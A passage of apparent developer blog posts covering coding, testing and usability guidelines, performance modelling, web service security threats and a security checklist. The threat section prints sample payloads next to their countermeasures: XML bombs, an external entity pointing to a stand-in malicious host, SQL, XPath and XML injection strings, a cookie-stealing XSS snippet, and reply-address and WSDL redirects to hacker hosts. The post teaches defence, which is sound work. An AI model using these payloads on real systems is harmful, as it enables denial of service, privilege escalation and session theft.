
Tuesday, January 8, 2013

Software Guidelines: Coding principles, Usability, Test

This is part of the blog series about (SOA) software guidelines. For the complete list of the guidelines (among others about design, security, performance, operations, database, coding, versioning) please refer to: http://soa-java.blogspot.nl/2012/09/soa-software-development-guidelines.html


Coding principles

  • Follow the best practices / style guidelines in your programming environment / programming language. Use automatic style checking (e.g. findbugs, checkstyle, PMD).
  • Strive for self-documenting code. Add comments where necessary. Use Javadoc.
  • Use a good IDE (e.g. Eclipse, VisualStudio) and good tools (e.g. SOAPUI for web service tests, Maven for builds, Hudson for continuous integration, Trac for issue tracking).
  • Use software configuration management (SCM) system (e.g. SVN)
  • Use proven design patterns and beware of anti-patterns
  • Limit accessibility: e.g. declare classes/methods/fields as private instead of public
  • Loose coupling, high cohesion (e.g. via Spring dependency injection).
  • Aspect oriented programming, separation of concerns (e.g.  Spring AOP for logging, security, transaction, error handling, cache)
  • Use declarative configuration instead of programmatic coding for cross-cutting concerns (e.g. WS-Policy for security). Ideally the code focuses only on the business logic and has little knowledge of the framework (e.g. using AOP & declarative transactions in Spring to hide the underlying transaction mechanism).
  • Use templates to reduce coding (e.g. Spring DAO templates, Velocity JSP templates)
  • Use standard libraries/solutions, don't reinvent the wheel.
  • If you use multithreading: beware of the performance impact of locking and beware of race conditions.
  • Defensive programming: test before executing (e.g. null checking in Java/BPEL), handle exceptions gracefully, protect against bad inputs (validate, substitute with legal values); see the sketch after this list.
  • Beware of common errors in your development language (e.g. null pointer exception in Java or buffer overflow in C++)
  • Use abstraction layer (e.g. use JAAS for authentication, DAO layer for database access) for loose coupling / flexibility
  • Choose libraries, vendors, tools carefully, consider e.g. maturity, popularity, support, future viability
  • Use thin clients (more robust, better performance)
  • Use early/static binding for better run-time performance
  • Pre-assign sizes instead of using dynamically growing data types.
  • Use a fixed number of parameters instead of a dynamic number of params.
  • Build the instrumentation up front during coding, e.g. tests (TDD, performance measurements), logging, build/deploy scripts.
  • Reuse result (e.g. using temp variables) to reduce number of calls
  • Use implicit interface instead of explicit to reduce method call overhead.
  • If you use async/multithreading: do you have message timing/sequencing problems and how do you deal with them? E.g. what if the software receives 3 message events (in arbitrary sequence) which are order-interdependent?
  • Write a short "getting started" developer document (e.g. designs, data models, class diagrams, dependencies, configurations, service request/response examples, troubleshooting / error scenarios). This document will be especially useful when you act as an external consultant / temporary project developer or if you need to pass the project to other colleagues (perhaps you leave the company, or have to take another project, or get promoted :).
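A minimal Java sketch of the defensive-programming item above (test before executing, protect from bad inputs); the EmployeeRequest type and the salary limits are hypothetical:

public class BonusService {

    public int calculateBonus(EmployeeRequest request) {
        // test before executing: fail fast on null or missing fields
        if (request == null || request.getSalary() == null) {
            throw new IllegalArgumentException("request and salary are required");
        }
        double salary = request.getSalary();
        // protect from bad input: validate the range before running the business logic
        if (salary < 0 || salary > 1000000) {
            throw new IllegalArgumentException("salary out of range: " + salary);
        }
        return (int) Math.round(salary * 0.05);
    }

    /** Hypothetical request DTO. */
    public static class EmployeeRequest {
        private Double salary;
        public Double getSalary() { return salary; }
        public void setSalary(Double salary) { this.salary = salary; }
    }
}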

Version management

·         How are the services & WSDLs/schemas (e.g. the common data model) versioned?
·         How are services retired? Do you consider backward compatibility? How many back-versions will you keep maintaining?
·         Provide standard structures in the software configuration management/SCM folders (e.g. folders for Java code, BPEL code, WSDL, XSD, XSLT/XQuery, test code, server-specific deployment plans, project documentation, project artifacts/deliverables).
·         Keep a minimum of code in the SCM head revision: no prototypes (which might ignore some QoS such as security) and no deprecated code. Put the prototypes in branches.
·         Minimize the number of JMS resources: use the same channel for different message versions (e.g. identified by a version tag in the SOAP header/namespace), so instead of using 3 topics (updateEmployee1.1, updateEmployee1.0, insertEmployee1.0) you can use only 1 Employee topic for better manageability & performance. If your service can only process a specific version, use the selective consumer pattern http://www.enterpriseintegrationpatterns.com/MessageSelector.html (see the sketch below).
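A minimal sketch of the selective consumer pattern with a JMS message selector; it assumes the producer sets a version property on each message (e.g. message.setStringProperty("version", "1.1")), which is an assumption for this example:

import javax.jms.JMSException;
import javax.jms.MessageConsumer;
import javax.jms.Session;
import javax.jms.Topic;

public class SelectiveConsumerExample {

    // one Employee topic for all message versions; the selector filters
    // the versions this service can actually process
    MessageConsumer consumerForVersion11(Session session, Topic employeeTopic) throws JMSException {
        return session.createConsumer(employeeTopic, "version = '1.1'");
    }
}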

Test

  • Have test cases been created for (all) use cases and functional requirements? Do you test all SLA/non-functional requirements (e.g. response time, availability/robustness, compatibilities)? Are the test cases traceable to the requirement numbers?
  • Have test cases been created for all exceptions (negative tests), including network failure?
  • Have you tested a variety of data inputs (valid, invalid, null/empty, boundary values, long input)?
  • Are the tests reproducible (e.g. automated, documented, code available in SCM, test case inputs in the database)? It's advisable to rerun the tests (regression test, performance test) when the administrator adds a new module/patch, adds a new service, or changes configuration.
  • How do you perform regression tests to prevent side effects (e.g. triggered by Hudson/a continuous integration framework)?
  • Do you also consider exploratory tests? Does the person who performs the exploratory tests have enough experience? Does a more experienced person need to assist with pair testing?
  • Is the test environment comparable with production (e.g. hardware performance, security constraints, OS/software/patch versions, server configurations)? Do you use a virtual lab to clone the production environment for testing (e.g. LabManager)?
  • Use realistic data.
  • See test checklists: http://soa-java.blogspot.nl/2012/09/test-checklists.html
  • Reconciliation test (e.g. for asynchronous processing, for automatic document processing): compare the number of input orders with the number of fulfilments/outputs. This test detects 2 problems: orders that are never fulfilled and orders that are fulfilled twice (a sketch follows below).
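A minimal sketch of such a reconciliation test over JDBC; the JDBC URL, credentials and the orders/fulfilments tables are hypothetical:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class ReconciliationTest {

    public static void main(String[] args) throws SQLException {
        try (Connection con = DriverManager.getConnection(
                "jdbc:oracle:thin:@//dbhost:1521/ORDERS", "testuser", "secret")) {
            long submitted = count(con, "SELECT COUNT(*) FROM orders WHERE trade_date = TRUNC(SYSDATE)");
            long fulfilledOrders = count(con, "SELECT COUNT(DISTINCT order_id) FROM fulfilments WHERE trade_date = TRUNC(SYSDATE)");
            long fulfilments = count(con, "SELECT COUNT(*) FROM fulfilments WHERE trade_date = TRUNC(SYSDATE)");
            // the two problems to detect: orders never fulfilled and orders fulfilled twice
            System.out.printf("submitted=%d, unfulfilled=%d, duplicated=%d%n",
                    submitted, submitted - fulfilledOrders, fulfilments - fulfilledOrders);
        }
    }

    private static long count(Connection con, String sql) throws SQLException {
        try (Statement st = con.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            rs.next();
            return rs.getLong(1);
        }
    }
}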


More about software testing:
Test checklists http://soa-java.blogspot.nl/2012/09/test-checklists.html
Development test http://soa-java.blogspot.nl/2012/09/development-test.html


Usability, GUI, User-friendliness

  • Involve users during GUI design, prototyping, test (e.g. regular Sprint demo)
  • Use iterative prototyping (e.g. Scrum sprint demo) for frequent user feedbacks.
  • Avoid complex pages. Keep it simple. Start with just enough requirements. Design and implement no more than what the requirements need. Use a minimum number of GUI widgets.
  • Anticipate user mistakes (provide cancel/undo buttons, defensive programming e.g. against invalid user input).
  • Minimize user effort.
  • GUI structure & flow/navigation are clear/intuitive/logical, consistent and predictable. Use the business workflow to drive the design of GUI forms & flows.
  • Conform to user culture (e.g. domain terminologies) and standard web-style (e.g. colors, typography, layout) at user organization.
  • User documentation / help provided.
  • Update GUI progressively with separate threads (using Ajax for example) to improve responsiveness.
  • Use a paging GUI (e.g. display only 20 results and provide a "next" button); see the sketch after this list.
  • Encourage the user to enter a detailed query in order to reduce the results and minimize the round trips of multiple searches.
  • Update the user on the application status (e.g. progress bar) and manage user expectations (e.g. "Your request has been submitted. You will receive the notification within 2 days.")
  • Inform the user to avoid surprise and confusion when the application will be forwarded to external application (e.g. before OAuth authorization confirmation,  before IDEAL money transaction).
  • Images cost bandwidth (especially for mobiles), so minimize image sizes & the number of images.
  • Avoid expensive computation while the user is waiting; use an asynchronous pattern or render the result progressively.
  • When the backend is busy, prevent impatient users from resending requests (which would hinder availability even more) by informing the user (e.g. "your request is being processed, please wait") or by disabling the submit button.
  • For mobile web/applications:
    • Reduce information (due to limited screen): use only about 20% information/features from the normal web version.
    • GUI components are big enough and well-separated for finger touch input.
    • Provide links to the normal (PC version) webpage or text-only (low bandwidth) version.
    • Device awareness & content adaptation e.g. viewport according to screen size.
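A minimal JPA sketch of the paging item above (display only 20 results per page); the Employee entity and the EntityManager wiring are hypothetical:

import java.util.List;
import javax.persistence.EntityManager;

public class EmployeePagingDao {

    private static final int PAGE_SIZE = 20;

    public List<?> findPage(EntityManager em, int pageNumber) {
        return em.createQuery("SELECT e FROM Employee e ORDER BY e.name")
                 .setFirstResult(pageNumber * PAGE_SIZE)   // skip the earlier pages
                 .setMaxResults(PAGE_SIZE)                  // fetch only one page from the database
                 .getResultList();
    }
}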
See Web-GUI checklist http://www.maxdesign.com.au/articles/checklist/


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




Monday, October 1, 2012

How to address software performance issues: Proactive vs Reactive?


As a Java developer, it was quite fun to learn a lot from the .NET communities, for example the "patterns & practices" series which Microsoft provides for free. Here are some lessons to learn from "Improving .NET Application Performance and Scalability" by Meier et al.

Reactive approach

• You investigate performance only when you face performance problems after design & coding, in order to avoid premature optimization.
• Your bet is that you need to tune & scale vertically (buying faster/more expensive hardware, more clouds-resources). You experience increased hardware expense / total cost of ownership.
• Performance problems are frequently introduced early in the design and cannot always be fixed through tuning or more efficient coding. Also, fixing architectural / design issues later in the cycle is very expensive and not always possible.
• You generally cannot tune a poorly designed system to perform as well as a system that was well designed from the start.

Proactive approach

• You incorporate performance modelling and validation since the early design.
• Iteratively you test your assumption / design decision by prototyping and validating the performance for that design (e.g. Hibernate vs iBatis)
• Evaluate your tradeoffs of performance/scalability with other QoS (data integrity, security, availability, manageability) since the design phase.
• You know where to focus your optimization efforts
• You decrease the need to tune and redesign; therefore, you save money.
• You can save money with less expensive hardware or less frequent hardware upgrades.
• You have reduced operational costs.


Performance modelling process

1. Identify key scenarios (use cases with specific performance requirements/SLA, frequently executed, consuming significant system resources, or running in parallel)
2. Identify workload (e.g. total concurrent users, data volume)
3. Identify performance objectives (e.g. response time, throughput, resource utilization)
4. Identify budget (max processing time, server timeout, CPU utilization percent, memory MB, disk I/O, network I/O Mbps utilization, number of database connections, hardware & license cost)
5. Identify processing steps for each scenario (e.g. order submit, validate, database processing, response to user)

For each step:

6. Allocate budget
7. Evaluate (by prototyping and testing/measuring): Does the budget meet the objective? Are the requirements & budget realistic? Do you need to modify the design / deployment topology? (see the sketch after this list)
8. Validate your model.
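A minimal sketch of evaluating a step budget by prototyping and measuring (steps 6-7); the OrderValidationStep class and the 200 ms budget are hypothetical:

public class BudgetCheck {

    public static void main(String[] args) {
        OrderValidationStep step = new OrderValidationStep();
        long worstMs = 0;
        for (int i = 0; i < 1000; i++) {               // warm up and repeat for a stable measurement
            long start = System.nanoTime();
            step.validate(new Order());
            worstMs = Math.max(worstMs, (System.nanoTime() - start) / 1_000_000);
        }
        System.out.println("worst case = " + worstMs + " ms, budget = 200 ms, within budget = " + (worstMs <= 200));
    }

    // hypothetical prototype of the processing step under evaluation
    static class Order { }
    static class OrderValidationStep {
        void validate(Order order) { /* prototype validation logic */ }
    }
}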


Performance Model Document

The contents:
• Performance objectives.
• Budgets.
• Workloads.
• Itemized scenarios with goals.
• Test cases with goals.

Use risk driven agile architecture

First, prototype and test the most risky areas (e.g. unfamiliar technologies, strong requirements in the SLA). The result will guide your next design step. Repeat the past tests (regression tests) in the next spirals, for example using continuous integration. When you address the most risky areas first, you still have more breathing room to look for alternatives or renegotiate with the customers in case of problems.



Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)


Reference:

"Improving .NET Application Performance and Scalability" by Meier et.al.

Monday, September 17, 2012

Web Service Security: Threats & Countermeasures

 

Denial of Service (DoS)


Oversize payload / Recursive XML

<attack1>
  <attack2>
        .... nested 10000 elements
            <attack10002> .... big data ....  </attack10002> ....
Countermeasure: limit the message size with a gateway/firewall, XSD restriction length, limit the nesting depth, don't use maxOccurs="unbounded" in XSD.
While we can also limit the message using application-server settings or XSD validation in the proxy, it's better to reject the messages as early as possible (e.g. in the gateway with an XML firewall) before the messages burden the load balancers and application servers.
Use throttling (also in the log file generation).

Entity Expansion / XML bomb

Excessive/recursive reference to entity to overwhelm the server, e.g.
<!DOCTYPE s[
<!ENTITY x0 "hack">
<!ENTITY x1 "&x0;&x0;">
... Entities from x1 to x99... 
<!ENTITY x100 "&x99;&x99;">
]>
...
 <soapenv:Body>
  ...
  <s>&x100;</s>
Countermeasure: reject message with <!ENTITY> tag (or whole DTD tag), use SOAP 1.2, use XML firewall.

XML External Entity DOS

Entity reference to external resources (e.g. a huge file) to overwhelm the server, e.g.
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY hack SYSTEM "http://malicious.kom/bigfile.exe" >
]>
...
 <soapenv:Body>
   ...
   <foo>&hack;</foo>
Countermeasure: reject message with <!ENTITY> tag (or whole DTD tag), use SOAP 1.2, use XML firewall.
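Both entity-based attacks above can also be blocked at the parser level. A minimal Java sketch, assuming the Xerces-based JAXP parser bundled with the JDK (the feature URIs follow the usual OWASP XXE-prevention guidance):

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class SecureXmlParserFactory {

    public static DocumentBuilder newSecureBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // reject any DOCTYPE declaration: blocks both XML bombs and external entities
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // belt and braces: also disable external entities and entity expansion explicitly
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }
}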

Malformed XML

To overwhelm the server with exceptions, e.g. omitting XML closing tag or wrong date-time format.
Countermeasure: XSD validation.

Weak XML definitions

e.g. <any> element which allows any additional elements
Countermeasure: prevent the use of <any>.

Buffer overflow

An oversized message to overwrite variables / operation addresses, or as a DoS attack.
Countermeasure: use a programming language/framework which is safer regarding buffer overflow (e.g. Java), bounds checking.

Non-content attacks

The DoS attacks described above are mainly content-based, sending malicious / oversized contents. But web services are indirectly also vulnerable to non-content attacks (e.g. SYN flood) that overwhelm the network infrastructure (firewall, switch/router).
Countermeasure: use a firewall/switch/router with anti-DoS filtering features such as TCP splicing/protocol analysis, bogon filtering, anomaly detection, rate limiting.


Command Injection


SQL injection

Manipulate the parameters such that a malicious SQL statement runs in the database,
e.g. <password>' or 1=1 </password>
Countermeasure: XSD validation, sanitize the input, use prepared statements.
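The coding section of the security checklist later in this series also recommends prepared statements against SQL injection. A minimal sketch; the users table and its columns are hypothetical:

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class UserDao {

    public boolean credentialsValid(Connection con, String userName, String passwordHash) throws SQLException {
        String sql = "SELECT 1 FROM users WHERE name = ? AND password_hash = ?";
        try (PreparedStatement ps = con.prepareStatement(sql)) {
            ps.setString(1, userName);       // bound as data, never concatenated into the SQL text
            ps.setString(2, passwordHash);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }
}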

Xpath injection

e.g.
//user[name/text()='Admin' and password/text()='' or '1' = '1']
or use union | to extend the query.
Countermeasure: XSD validation, sanitize


XML Injection

Web service input:
Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><role>admin</role><mail>s4tan@hackers.com

The result in the xml database:
<user>
    <username>tony</username>
    <password>Un6R34kb!e</password><!--</password>
    <role>guest</role>
    <mail>--><role>admin</role><mail>s4tan@hackers.com</mail>
</user>
So the attacker changes the default role from guest to admin.

Countermeasure: XSD validation, sanitize (e.g. encode <,>)

XSS using CDATA Injection

Vulnerability when you display the WS response on a web page or evaluate the response as Ajax objects, e.g. to reveal the session ID in the client cookie:
<![CDATA[<]]>script<![CDATA[>]]>alert(document.cookie) <![CDATA[<]]>/script<![CDATA[>]]>
Countermeasure: XSD validation, sanitize (e.g. encode <,>)

Execute binary files or system call command

The attack methods above (e.g. SQL injection, XML injection) can be used to run system commands using database / XML processor features (e.g. XSLT exec()).
Countermeasure: XSD validation


Malicious Reference

Routing Detour

The attacker changes the reference address in the http-header/WS-Routing/WS-Addressing, e.g.
<wsa:ReplyTo>
  <wsa:Address>http://hackersWS</wsa:Address>
</wsa:ReplyTo>
Countermeasure: SSL


Reference Redirect

Reference to malicious external reference. e.g.
<sig:Signature>
  ....
  <sig:Reference URI="http://maliciousweb/VERYBIGFILE.DAT">
Countermeasure: prohibit reference to resource outside the document.

Impersonation

A malicious web service with a similar interface (WSDL).
Countermeasure: protect the web service reference from man in the middle attack with SSL. Use certificate authentication.

Authentication (WSS or transport-level)


Weak password

The attacker guesses the password (e.g. using brute-force / dictionary attacks).
Countermeasure: use stronger authentication (e.g. certificate based,  multi factor authentication), enforce strong password (e.g. minimum length & character sets), lockout account after multiple authentication failures, don't give clue to the hackers e.g. "valid username but wrong password".

Replay attack

The attacker captures the authentication token (e.g. password, session token) and then reuses it in his request.
Countermeasure: one time nonce/password digest, SSL, use certificate-based authentication


Authorisation


URL traversal attack

e.g. the hacker knows the Restful WS endpoint
GET http://library/booklist/?title="hacking"
the attacker might try
GET http://library/secretdocumentlist/?title="hacking"
Countermeasure: ACL on the URL tree.

Web parameter manipulation attack

REST WS e.g.
GET http://library/secretdocumentlist/?role="employee"
GET http://library/secretdocumentlist/?role="boss"
Countermeasure: ACL. Don't make security decisions based on URL params (sessionID, username, role).

Illegal Web method

e.g. The attacker knows the RESTful-WS url of the GET operation to read the data; he can try the POST operation to modify the data.
Countermeasure: ACL for method access.


Encryption


Weak cryptography

Countermeasure: Use well-proven encryption algorithms (e.g. AES) in well-proven libraries instead of inventing and implementing your own algorithm. Protect your key.

Failure to encrypt the messages

If you don't use encryption, attackers can capture your authentication token and use it to impersonate you.
Countermeasure: Use encryption (e.g. SSL or WSS & XML-Encryption)

Messages are not protected in the intermediaries

You use point-to-point encryption (SSL), but inside the intermediaries your message is decrypted. An intermediary can read your sensitive data and use it to his advantage.
Countermeasure: Use end to end encryption (WSS & XML-Encryption)

Data tampering

An attacker modifies your message for his advantage.
Countermeasure: signature and encryption (WSS & XML-Encryption)

Schema poisoning/ metadata spoofing

Maliciously changing the WSDL (e.g. to redirect the service address to malicious web, to manipulate data types, to remove security policy) or manipulating the security policy document (to lower security requirement), e.g.
<wsdl:port name="WSPort" binding="tns:WSBinding">
  <soap:address location="http://hacker.kom/maliciousWS"/>
</wsdl:port>
Countermeasure: check the authenticity of metadata (e.g. signing), use SSL to avoid man in the middle attack

Repudiation

A client refuses to acknowledge that he has violated the user agreement (e.g. performed a dictionary attack against the web-service authentication).
Countermeasure: keep client message signature in the log. Protect the log files.



Information disclosure



WSDL disclosure

The WSDL contains a lot of information for the attacker (operations, message formats).
Countermeasure: protect the WSDL endpoint with an ACL/firewall. Use robots.txt to keep the WSDL from appearing in Google.

UDDI disclosure

UDDI gives the attacker information about wsdl location.
Countermeasure: don't publish the wsdl in UDDI

Error message

Attackers send failure messages / DoS attacks such that the web service returns error messages which can reveal information (e.g. database server address, database vendor).
Countermeasure: don't publish sensitive information (e.g. connection strings) in the error message. Sanitize error messages (e.g. the stacktrace).


Testing Tools

• SOAPUI
• WSDigger
• WSFuzzer



Security checklist:

http://soa-java.blogspot.nl/2012/09/security-checklists.html


Web service message level security WS-Security (WSS) and transport level security (TLS):
http://soa-java.blogspot.nl/2013/04/web-service-security-message-level-vs.html


Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com





References:

• SOA Security by Kanneganti
• Oracle Service Bus 11g Development Cookbook by Schmutz & Biemond et al.
• Developing Web Services with Apache CXF and Axis2 by Tong
• ws-attacks.org
• Web Service Hacking, Progress Actional Whitepaper
• OWASP Web Service Security Cheat Sheet
• Attacks on Web Services By Bidou
• Web Services Security By Negm, Forum Systems Inc.
• OWASP Top Ten Web Services Vulnerabilities By Morana
• http://www.soapui.org/soap-and-wsdl/web-service-hacking.html
• NIST guide secure web service
•  http://clawslab.nds.rub.de/wiki/index.php/XML_C14N_Entity_Expansion
•  http://clawslab.nds.rub.de/wiki/index.php/XML_External_Entity_DOS
• http://projects.webappsec.org/w/page/13247004/XML%20Injection
• http://clawslab.nds.rub.de/wiki/index.php/Routing_Detour
• http://clawslab.nds.rub.de/wiki/index.php/Reference_Redirect

Tuesday, September 11, 2012

Security Checklist


This list is mainly for developers, but it can also be useful for architects, security managers and testers. It is written mainly from a design and coding perspective, enriched with configuration, operational and human-process aspects.

Please see also "Web services security threats": http://soa-java.blogspot.nl/2012/09/web-service-security-threats.html

This is part of the blog series about (SOA) software guidelines. For the complete list of the guidelines (among others about design, security, performance, operations, database, coding, versioning) please refer to: http://soa-java.blogspot.nl/2012/09/soa-software-development-guidelines.html

General design principles

• Prefer to use policy-based declarative security instead of programmatic security: separation between the security configuration and the business code. Beware that the business code and the security configuration typically have different life cycles and are implemented/managed by different people.
• Use declarative security instead of programmatic security: separation between the application logic and the cross-cutting concerns (e.g. security, logging).
• Prefer to use message level / end-to-end security (e.g. WSS) than transport level / point-to-point security (e.g. SSL): to protect the messages in the intermediate services and flexibility to protect only portions of the messages (due to performance).
• Does the service/data need authentication, authorization, signature/non-repudiation, encryption?
• If the web service is used to wrap a legacy service: be aware of the vulnerabilities of the legacy service and of how to reconcile the security models (e.g. credential/role mapping); some legacy applications don't have any security provisioning at all.
• Use white lists instead of black lists
• Throttle the requests / message sizes to prevent DoS
• Defense in depth: don't rely on a single layer of security (e.g. apply also authentication & SSL instead of protecting the infrastructure with a firewall only)
• Check at the gate (e.g. validate and authenticate early)
• Secure the weakest link
• Compartmentalize: isolate and contain problems e.g. firewall/DMZ, least privileged accounts, root jail.
• Secure by default e.g. close all ports unless it's necessary
• Communicate the assumptions explicitly e.g. firewall will secure all our internal services with no ports open to outside world
• Understand how the infrastructure restriction (e.g. firewall filtering rules, supported protocol, ports allowed) will affect your design
• Understand the organizational policies/procedure (e.g. what applications and users are allowed to do) so you don't have acceptance problem by production team because your services breach these policies
• Understand the deployment topology due to your organization structure (e.g. your company has many remote branches offices connected to the main server-farm via VPN)
• Understand the identity propagation / credential mapping across trust boundaries (e.g. apache web account >  weblogic web service account  > database account)
• Security measures (e.g. authentication, encryption, signing) will cost performance (increasing processing cost and message size) as well as other quality attributes such as usability, maintainability (e.g. distribution of certificates) and operability (e.g. security service / identity provider failure). So consider the trade-off between security and other quality attributes regarding your company infrastructure and policies (e.g. if the firewall policy in your company is very strict, you might lessen the encryption requirement for the internal services).
• While applying security by design, I still keep the "security through obscurity" to some extent, e.g. I will not publicly publish the security architecture of my company (the endpoints/ports, wsdl/schema, libraries used, etc).


Security process & management


• Design & code review (e.g. login & logout mechanisms, authorization logic in each Struts action)
• Include security in your development process (e.g. SDL), use threat modeling during the analysis & design phases.
• Make sure that your programmers and network/server administrators are capable of dealing with security issues; arrange training if necessary.
• Make sure that the operational team knows the contingency procedures (e.g. what to do in case of a DoS attack or a virus spreading in your network). Have a contingency plan / crisis management document ready: where the configurations are, how to isolate and handle failures, how to restart in safe mode, how to turn-on/turn-off/undeploy/deploy modules/services/drivers, who gets informed and how, which services/resources have priority (e.g. telephony service, logging service, security services). Have this document in multiple printed copies (the intranet and printers may not work during a crisis). The crisis team should have exercised the procedures (e.g. under a simulated DoS attack) and measured the metrics during the exercise (e.g. downtime, throughput in degradation mode).
• Plan team vacations such that at least one of the crisis team members is always available. Some organizations need a 24/7 full-time dedicated monitoring & support team.
• Hire external party for penetration testing and security audit.
• Document incidents (root causes, solutions, prevention, lessons learned), add the incident handling procedures to the crisis management document.
• Establish architecture policies for your department. Establish a clear role who will guard the architecture policies and guidelines e.g. the architects using design/code review.
• For maintainability & governance: limit the technologies used in the projects. Avoid constantly changing technology while still open to the new ideas. Provide stability for developers to master the technology.
• Establish change control. More changes mean more chances of failure. You might need to establish a change committee to approve change requests. A change request consists of: why, risks, back-out/undo plan, version control of configuration files, schedule. Communicate the schedule with the affected parties beforehand.


 Authentication

• Prefer stronger authentication (e.g. 2-way X.509 certificate authentication) over basic authentication (password based).
• If you use basic authentication, use SSL or a password digest to protect the password.
• Credentials and authentication tokens / passwords are stored encrypted / as salted hashes (see the sketch after this list).
• Force users to use strong passwords and/or multi-factor authentication. Use a password expiration feature.
• Avoid sending passwords to external applications (e.g. when an external application needs to access resource services), use OAuth instead.
• Disable test and example accounts.
• Credentials (e.g. passwords, service accounts) are centralized (e.g. in an LDAP server) for better manageability. Redundancy (e.g. fail-over clusters) can be used to prevent single points of failure.
• If you use certificate-based authentication: always check the validity of the certificates (e.g. using a CRL).
• Prevent brute-force / dictionary attacks (e.g. for add a new user webpage) using CAPTCHA, email validation, locking after max-attempts.
• Use SSO / a centralized security service: users don't have to have many accounts/passwords, users don't have to share their passwords with many applications/resources, and developers don't have to maintain multiple authentication mechanisms in different systems. With a federated identity provider, you can centralize the credentials across organizations.
• Use standard security solutions (e.g. OAuth, OpenID, SAML to exchange security messages), don't reinvent new wheels. It's more risky to implement your own security solution than using a well tested solution.
• Authentication should be in the server side (instead of client side/JavaScript).
• Avoid having passwords as plain text in configuration files (e.g. fstab); save passwords in password/credentials files and protect these files (chmod 600 and encryption if possible).
• Beware of remote OS authentication, for example in Oracle database, since an attacker can try to connect using a username that has the same name as an OPS$ account in the database.
• Send a confirmation when a user changes his/her password, email, mobile or other sensitive personal data.
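A minimal sketch of storing passwords as salted hashes with PBKDF2; PBKDF2WithHmacSHA256 needs Java 8+, and the iteration count and key length are illustrative values, not a policy recommendation:

import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class PasswordHasher {

    public byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    // store salt + hash, never the plain password; recompute and compare on login
    public byte[] hash(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 120000, 256);
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                               .generateSecret(spec)
                               .getEncoded();
    }
}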


Session management

• Limit the life time of cookie or authentication/authorization tokens.
• Prevent replay attack by using one time nonce.
• Prevent CSRF using a secret nonce as a request parameter (e.g. for OAuth) and validate the nonce on the server side; beware that a nonce cookie doesn't prevent CSRF. Prevent CSRF by informing the user about the action (e.g. "you're about to transfer $100") and asking for reconfirmation/reauthentication.
• Session IDs are strongly randomly generated, at least 128 bits long.
• Appropriate logout mechanisms (e.g. invalidate sessions, clear all cookies).
• Force user to re-authenticate for sensitive operations (e.g. change password).
• Hide the session ID (e.g. in secure cookies instead of in a GET url parameter or hidden form field).
• Validate the security token with an HMAC or encrypt the token, e.g. session ID cookies must be encrypted / use HttpOnly secure cookies (see the sketch after this list).
• Limit the cookies domain & path.
• Always provide logout feature. Make sure that logout is properly done (invalidate session, remove session cookies).
• Issue a new session id for each login action (to prevent session fixation).
• Identify possible session hijacking when multiple IP addresses / geolocations simultaneously use the same session ID.
• Use anti-caching http headers (Cache-Control: no-cache and Pragma: no-cache).
• Use HttpOnly cookies to prevent client-side (Java)Scripts from querying the cookies.
• Set the session timeout.
• Appropriately handle requests which indicate security check circumvention or an obvious attempt at privilege escalation, e.g. in case of requests with an invalid sessionID: log the sender's IP address, invalidate the session and redirect to the login page.
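A minimal Servlet 3.0+ sketch of an HttpOnly, secure session cookie with a restricted scope; the cookie name, path and lifetime are illustrative:

import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;

public class SessionCookieHelper {

    public void addSessionCookie(HttpServletResponse response, String sessionId) {
        Cookie cookie = new Cookie("JSESSIONID", sessionId);
        cookie.setHttpOnly(true);    // not readable from client-side JavaScript
        cookie.setSecure(true);      // sent over HTTPS only
        cookie.setPath("/myapp");    // limit the cookie path
        cookie.setMaxAge(30 * 60);   // limit the lifetime to 30 minutes
        response.addCookie(cookie);
    }
}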

Authorisation

• Determine which web service operations or which web page/actions need authorization.
• Determine the privilege/roles for your service/web.
• Strong ACL (in operating system/file system level, application level, servers).
• Apply the least privilege principle, don't use admin account for daily operations (e.g. read database), create specific accounts for specific operations (e.g. CreditcardReadOnlyAccount, UpdateInventoryAccount, WebShopInventoryReadOnlyAccount).
• Audit/log administrator activities (e.g. create new user, grant).
• Remove the default accounts & ACL in your system if possible (e.g. remove BUILTIN/Administrators group from SQL Server login) or rename the default (administrative) accounts if possible (e.g. sa user  in SQLServer).
• Run the server in root jail.
• Centralize authorization (e.g. using OAuth) to reduce the burden of reconciling different access rights in different systems across trust boundaries (e.g. apache role=boss mapped to database role=readwriteEmployeeData).
• Use ACLs on the URL tree and the web methods allowed, e.g. the REST url http://myweb.kom/myprofile should be accessible to me & my friends only for the GET method and to me only for the PUT method.
• Use ACLs to protect directories and files from traversal attacks.
• Use ACLs per user/session to filter direct & indirect references (e.g. links).
• Authorization checks in all protected GUI operations (e.g. Struts actions, admin html pages) and web service operations.
• Beware of the system call features in your framework that can be used for hostile purposes, e.g. Runtime.exec() in Java or the stored procedure xp_cmdshell in SQLServer. Solution: root jail, least-privilege accounts, ACL, disable unnecessary features, run the application server with read-only privilege on the web-root directory (e.g. the Apache nobody user).
• Make sure account lockout doesn't result in DoS.
• Check (e.g. using a white-list) all references submitted via input (e.g. webservice request, file, database).
• Avoid url-jumping (e.g. Checkout -> Delivery instead of Checkout -> Payment -> Delivery) by checking the last visited page (e.g. in a session variable).
